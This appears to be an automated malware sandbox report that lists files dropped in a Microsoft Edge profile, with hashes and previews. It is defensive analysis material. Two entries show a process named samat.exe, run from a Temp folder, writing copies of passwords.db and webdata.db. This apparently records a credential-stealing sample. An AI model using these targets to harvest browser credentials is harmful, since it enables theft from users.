C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f6ec995b-989c-4199-b86f-23eabb82f360.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.125147104868582
Encrypted:	false
SSDEEP:	6:HE98CwVq2P923oH+TcwtpIFUt8YE98BRVFwgZmw+YE98BRVFwIkwO923oH+Tcwt7:k98CwVv4YebmFUt8/98nYg/+/98nYI5f
MD5:	3DE30D8335CCB28F6ECE597B75D414A8
SHA1:	410F4CE8CAFB1881D61569D12F0B11BAC49FD097
SHA-256:	0414EA4ECD2EA1A54651D46EA919BA09C050CD310A57CE4F26F7A341F71DD1DE
SHA-512:	45EF392476BC53C589E0E2FCAFBBB63BE9DE5BFE422D6E240EE5F7910EAD12E395FBA0D433181B692C3A56F587643FEE78DB81C21FF48704C50EFDBF3775B7F9
Malicious:	false
Preview:	2024/11/21-16:13:01.229 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-16:13:01.231 440 Recovering log #3.2024/11/21-16:13:01.231 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	325
Entropy (8bit):	5.125147104868582
Encrypted:	false
SSDEEP:	6:HE98CwVq2P923oH+TcwtpIFUt8YE98BRVFwgZmw+YE98BRVFwIkwO923oH+Tcwt7:k98CwVv4YebmFUt8/98nYg/+/98nYI5f
MD5:	3DE30D8335CCB28F6ECE597B75D414A8
SHA1:	410F4CE8CAFB1881D61569D12F0B11BAC49FD097
SHA-256:	0414EA4ECD2EA1A54651D46EA919BA09C050CD310A57CE4F26F7A341F71DD1DE
SHA-512:	45EF392476BC53C589E0E2FCAFBBB63BE9DE5BFE422D6E240EE5F7910EAD12E395FBA0D433181B692C3A56F587643FEE78DB81C21FF48704C50EFDBF3775B7F9
Malicious:	false
Preview:	2024/11/21-16:13:01.229 440 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/11/21-16:13:01.231 440 Recovering log #3.2024/11/21-16:13:01.231 440 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2650521159351493
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMTSAELyKOMq+8yC8F/YfU5m+OlTLVumQ:Bq+n0JT9ELyKOMq+8y9/Own
MD5:	69BCC1A8E4CE7802314FF4B2AF000327
SHA1:	169D0E21DADF1B148658AE6A3623C4224EE6A3FB
SHA-256:	2C516D1F34ED9D58E6B6E03439F69FCB8EC9B31E114570EBD4241F60C4655DBB
SHA-512:	BA20F00E032C82874F4B3D89A4C6E837805F4446B338CDF53D3DE8F345B8934BA03FC5804FE9DA9EE7501CDD1210292EB5490C05322CB7B3FE96A34763408619
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\ee33b7df-3722-4cec-8800-38927bf5466f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9615
Entropy (8bit):	5.117051869036601
Encrypted:	false
SSDEEP:	192:stjykdlAhs1gpsZihUkSs0o8bKbV+F0PQA66WJaFIMYJP3YJ:stjy/hs1gpfh6FKbGMQx6WJaTYO
MD5:	DE5BE088A4C9E59227C455C1EF363EAE
SHA1:	2407ADB1D1DD4B5DF13FC9342AE9420D5B074197
SHA-256:	8D279B7549DCE90272316E340B19ABE809392869901ED832AC959E679492FF0D
SHA-512:	FB54DCB2DBE2B1E427587D0A9CFB7CE5D390BE9B406C0018295B60E04FF1872AFBF53C19F1AD81AD0A34EF614E6B57AF559D50D3BD198DE41189C646644C4E90
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376697183230723","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":10090,"left":10000,"maximized":false,"right":10500,"top":10000,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":0,"browser_content_container_width":456,"browser_content_container_x":0,"browser_content_container_y":111,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_lin

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\f647dbf3-035e-4786-aebd-fde2e5cf2ff7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.05389321689687362
Encrypted:	false
SSDEEP:	6:GtStutf8QYStutf86KR9XCChslotGLNl0ml/Vl/XoQXEl:MtfQtfbKLpEjVl/PvoQ
MD5:	8F89827C68BF82BB17F728C778738F9A
SHA1:	550816A3C641E8D07AAFB73DA390195EA9C3A82F
SHA-256:	29C32786D0FC89E13340F365C63D148B10D88AF390058D9F450A241DCB641426
SHA-512:	53BB9A58BB91D970E1CE90D9A87612B3514276BDEEEB73E1D79F1E5B2A3D18D08487B7B1CA52BBE30BA135697C8D2E8F338B7966A67F2B78FD55AF489C9C7240
Malicious:	false
Preview:	..-.......................%.0....4..}........Q..-.......................%.0....4..}........Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	86552
Entropy (8bit):	0.8703482269686272
Encrypted:	false
SSDEEP:	48:ywXzx8I/02TlO+scbX+on9VAKAFXX+hV2VAKAFXX+n8xOqVAKAFXX+vqnUYVAKAN:jjx7/02b2dNshTNsOO5NsvlNsEY8
MD5:	FDD982E19A3320D6C898913F3AF07AC0
SHA1:	5BB0EBC64E22BAA3284E1059789C07054167FAFB
SHA-256:	AD744CB140522D9489AAD9E6EACB39158CC27E67E184F742A0BE4361E69C82FE
SHA-512:	E7DF093357B2DE63E83FCD1D5B76BDA7CF81007FF3ED89B564F21F2B7AB10B9E9ACF4F299A6B7E542E99DD3787EFE748966801FDF9285C57265E5958EB35F297
Malicious:	false
Preview:	7....-...........4..}...8.?L.0.........4..}........C.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.1775586793808905
Encrypted:	false
SSDEEP:	6:HE987Fq2P923oH+TcwtfrK+IFUt8YE98sRNJZmw+YE98sRNDkwO923oH+TcwtfrF:k98hv4Yeb23FUt8/98sLJ/+/98sLD5LR
MD5:	39AD3F0413E0D61BB80572FCF1BA9892
SHA1:	98692837F3BA48A6ABFA8D9BC2EC4CAAEC9970E5
SHA-256:	244016237F011A47741E61BA5E0DB3C66CD3C52B40069FC9BB8EEC1DB6E95A5E
SHA-512:	6F40C81EA617672049C63D1F7995C4558990D0E7F2AF78806A52E9EECB53A5A7EA5561A7559FE01F32B9CC7C970C0B9F5BF25FE5A4367D6A4EB3E9826623EA05
Malicious:	false
Preview:	2024/11/21-16:13:03.319 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-16:13:03.320 714 Recovering log #3.2024/11/21-16:13:03.320 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.1775586793808905
Encrypted:	false
SSDEEP:	6:HE987Fq2P923oH+TcwtfrK+IFUt8YE98sRNJZmw+YE98sRNDkwO923oH+TcwtfrF:k98hv4Yeb23FUt8/98sLJ/+/98sLD5LR
MD5:	39AD3F0413E0D61BB80572FCF1BA9892
SHA1:	98692837F3BA48A6ABFA8D9BC2EC4CAAEC9970E5
SHA-256:	244016237F011A47741E61BA5E0DB3C66CD3C52B40069FC9BB8EEC1DB6E95A5E
SHA-512:	6F40C81EA617672049C63D1F7995C4558990D0E7F2AF78806A52E9EECB53A5A7EA5561A7559FE01F32B9CC7C970C0B9F5BF25FE5A4367D6A4EB3E9826623EA05
Malicious:	false
Preview:	2024/11/21-16:13:03.319 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/21-16:13:03.320 714 Recovering log #3.2024/11/21-16:13:03.320 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.173549775034699
Encrypted:	false
SSDEEP:	6:HE987a4q2P923oH+TcwtfrzAdIFUt8YE987bZmw+YE987MDkwO923oH+TcwtfrzS:k989v4Yeb9FUt8/98v/+/98O5LYeb2J
MD5:	AB27A5B6F10266976CAD752424450795
SHA1:	B44EB633CCDE5265F09F617B6BCA68F71020CF89
SHA-256:	1E53DD86E27586817AA2B163DCA712C31384FCE5FEABBC4EAB66CA850304A8FC
SHA-512:	18A28DF4051FA09CA371F6EF93D9BF35927DC3A23F53DFEDD50065530357E7FE3F4311E513633506C60BAD727BD891A56543419B1E55B2FD93625F6F06A66E52
Malicious:	false
Preview:	2024/11/21-16:13:03.315 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-16:13:03.316 714 Recovering log #3.2024/11/21-16:13:03.317 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	339
Entropy (8bit):	5.173549775034699
Encrypted:	false
SSDEEP:	6:HE987a4q2P923oH+TcwtfrzAdIFUt8YE987bZmw+YE987MDkwO923oH+TcwtfrzS:k989v4Yeb9FUt8/98v/+/98O5LYeb2J
MD5:	AB27A5B6F10266976CAD752424450795
SHA1:	B44EB633CCDE5265F09F617B6BCA68F71020CF89
SHA-256:	1E53DD86E27586817AA2B163DCA712C31384FCE5FEABBC4EAB66CA850304A8FC
SHA-512:	18A28DF4051FA09CA371F6EF93D9BF35927DC3A23F53DFEDD50065530357E7FE3F4311E513633506C60BAD727BD891A56543419B1E55B2FD93625F6F06A66E52
Malicious:	false
Preview:	2024/11/21-16:13:03.315 714 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/21-16:13:03.316 714 Recovering log #3.2024/11/21-16:13:03.317 714 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ec21.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4f837.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF51eca.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
SHA1:	960DEF6FFC2B4EA2D32A4433BF7E241945326EE5
SHA-256:	091B71714F876876E45ADCCCDFF3CEE21E1B7612556B15482BDC57DF3C82A996
SHA-512:	BE68ADC7F42D518D240461DFBB129098CCA53943DEB84E1DBBB0440179B3D0C036EC74823C14A6CA65DE9FADE2013CCDC800006297E0ABAE37C2CD9AA8364680
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF52d22.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090767229766663
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMiwuF9hDO6vP6O+Ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6Ktbz8hu3VlXr4CRo1
MD5:	71DDEA006A2FFF80ECAF157F5C2AFC1B
